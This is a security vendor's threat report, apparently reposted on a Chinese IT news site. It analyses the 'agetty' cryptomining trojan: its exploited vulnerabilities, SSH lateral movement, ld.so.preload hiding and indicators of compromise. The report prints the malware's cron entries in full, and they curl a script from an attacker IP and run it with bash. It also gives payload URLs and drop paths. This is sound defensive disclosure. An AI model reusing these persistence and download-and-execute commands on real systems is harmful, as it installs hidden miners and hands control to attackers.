IT资讯 挖矿木马 agetty 来袭

reed · 2021-12-17 18:00:07 · 热度: 97
  • 报告编号:B6-2021-121601
  • 报告来源:360CERT
  • 报告作者:360CERT
  • 更新日期:2021-12-16

木马简述

近期 360 安全大脑监测到一款名为 agetty 的挖矿木马,利用 GitLab 远程命令执行漏洞(CVE-2021-22205)等进行攻击,入侵后通过 SSH 连接进行横向移动,同时添加恶意计划任务,并隐藏挖矿进程,最终投递 xmrig 挖矿程序进行牟利。

分析木马内容

agetty 的挖矿木马利用以下漏洞进行攻击:

挖矿木马 agetty 来袭

序号 漏洞名称 漏洞编号
1 Atlassian Confluence远程代码执行漏洞 CVE-2021-26084
2 GitLab ExifTool远程命令执行漏洞 CVE-2021-22205
3 WebLogic远程代码执行漏洞 CVE-2020-14882

成功利用后从http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh

下载恶意脚本1.sh并执行。

1.脚本首先清除各类竞品挖矿木马家族

挖矿木马 agetty 来袭

2.随后将定时下载执行1.sh恶意脚本写入计划任务。

挖矿木马 agetty 来袭

3.同时在设备上查找 config.json 挖矿配置文件,将其中的用户名替换为 agetty 木马自己的钱包地址,以期将他人的挖矿收益据为己有。

挖矿木马 agetty 来袭

4.根据系统位数分别下载木马文件保存至 /tmp/.gvfsd-metadata、/tmp/.seapplet 并执行。

挖矿木马 agetty 来袭

agetty 挖矿木马还会在/.ssh/config、.bash_history、/.ssh/known_hosts 等文件中搜索 SSH 凭证进行横向移动。

挖矿木马 agetty 来袭

同时将木马内嵌的恶意 so 文件释放到 /usr/local/lib/v.so,通过 /etc/ld.so.preload 的方式进行预加载。将定时任务

0 */5 * * * curl -fsSL -k http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh -O /tmp/1.sh \\n

写入到/etc/cron.d/root文件;

将定时任务

0 */5 * * * curl -fsSL -k http://111.85.159.55:9091/view/userBehavior/.reporter/1.sh -O /tmp/1.sh;bash /tmp/1.sh\\n

写入到 /var/spool/cron/root、/var/spool/cron/crontabs/root 文件。

此外,/usr/local/lib/v.so 还 hook 了 fopen、fopen64、lstat、open、readdir、rmdir、unlink、unlinkat 等等函数,过滤掉其中包含的 .mate-terminal、ld.so.preload、v.so 信息,实现隐藏自身的目的。

挖矿木马 agetty 来袭

根据 agetty 木马的钱包地址,我们还关联到另一样本 0978fcab87c342330b7d34e6b8709124,xmrig 矿机与 config.json 配置文件分别托管在:

https://test123123123fdsafds.coding.net/p/test/d/test/git/raw/master/agetty
https://test123123123fdsafds.coding.net/p/test/d/test/git/raw/master/config.json

该钱包目前在不同矿池的算力和收益图分别如下:

挖矿木马 agetty 来袭 挖矿木马 agetty 来袭

关联分析

经过分析,agetty木马的恶意脚本1.sh,与友商曾经报告的MimuMiner木马的 shell 脚本在部分内容上具有较高的相似度。背后团伙可能存在一定关联。

左边为agetty木马的脚本内容,右边为MimuMiner脚本。 挖矿木马 agetty 来袭

IOC

MD5:

MD5 描述 9f15f94ebcaa432b55f743509253add9 木马模块 43cbd69a5bbea0bf01abd54628a75d2b 木马模块 ab6faf8b842bd7daab61a9cb35dc9110 1.sh 6a3b0ecfded0a99ef78b35df2e61da9d 64.tar.gz 47cabcf25234fa9ee1659b6dfe939aed 86.tar.gz 0978fcab87c342330b7d34e6b8709124 木马模块 217c5e889c058c3ec7a261a654f39a0c agetty(XMRig 6.15.2) 0ac5c93ba9d7e1a1a35775aa639fdb08 config.json

矿池:

pool.supportxmr.com:443

xmr-asia1.nanopool.org:14444

钱包地址:

87EjF5M4uFCSQ2bHngLNTPgGA31aNjYvQbHvWpDkJvkYA4Zja5PG9Tdbe2TXDfEhPkD9Erh6mRW1cffw5UEbdhSpCSy1sVC

时间线

2021-12-16 : 360 高级威胁研究分析中心发布分析报告

参考链接

1、 https://mp.weixin.qq.com/s/d8citoIBpMQKsVf931PLFw

猜你喜欢:
暂无回复。
需要 登录 后方可回复, 如果你还没有账号请点击这里 注册